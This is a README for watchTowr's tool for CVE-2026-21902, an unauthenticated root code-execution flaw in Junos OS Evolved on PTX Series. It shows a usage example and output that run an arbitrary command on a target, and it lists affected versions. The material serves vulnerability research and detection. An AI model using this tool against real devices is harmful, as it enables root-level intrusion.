Share
## https://sploitus.com/exploit?id=5A3EACA7-5699-53EF-837F-087B89D53298
# watchTowr-vs-JunosEvolved-CVE-2026-21902
Detection Artifact Generator for Juniper Junos Evolved CVE-2026-21902.
https://github.com/user-attachments/assets/a7d667e1-7636-4097-ab3f-838944cdcccc
See our [blog post](https://labs.watchtowr.com/) for technical details.
# Detection in Action
```
python .\watchTowr-vs-JunosEvolved-CVE-2026-21902.py 127.0.0.1 -c "id > /var/home/admin/watchTowr.txt"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-JunosEvolved-CVE-2026-21902.py
(*) Juniper JunosEvolved Unauthenticated Remote Code Execution Detection Artifact Generator
- McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-21902]
[+] COMMAND cmd1 created
[+] DAG dag1 created
[+] DAG INSTANCE instance1 created
[+] Config committed...
[#] Waiting for command execution...
[+] Command executed, check the target for results!
```
# Description
This script attempts to detect if Junos Evolved OS & PTX Series is vulnerable to CVE-2026-21902.
# Affected Versions
This issue affects Junos OS Evolved on PTX Series:
* 25.4 versions before 25.4R1-S1-EVO, 25.4R2-EVO.
This issue does not affect Junos OS Evolved versions before 25.4R1-EVO.
This issue does not affect Junos OS.
For more information read the advisory [Junos OS Evolved: PTX Series: A vulnerability allows a unauthenticated, network-based attacker to execute code as root](https://supportportal.juniper.net/s/article/2026-02-Out-of-Cycle-Security-Bulletin-Junos-OS-Evolved-PTX-Series-A-vulnerability-allows-a-unauthenticated-network-based-attacker-to-execute-code-as-root-CVE-2026-21902).
# Follow [watchTowr](https://watchTowr.com) Labs
For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team
- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber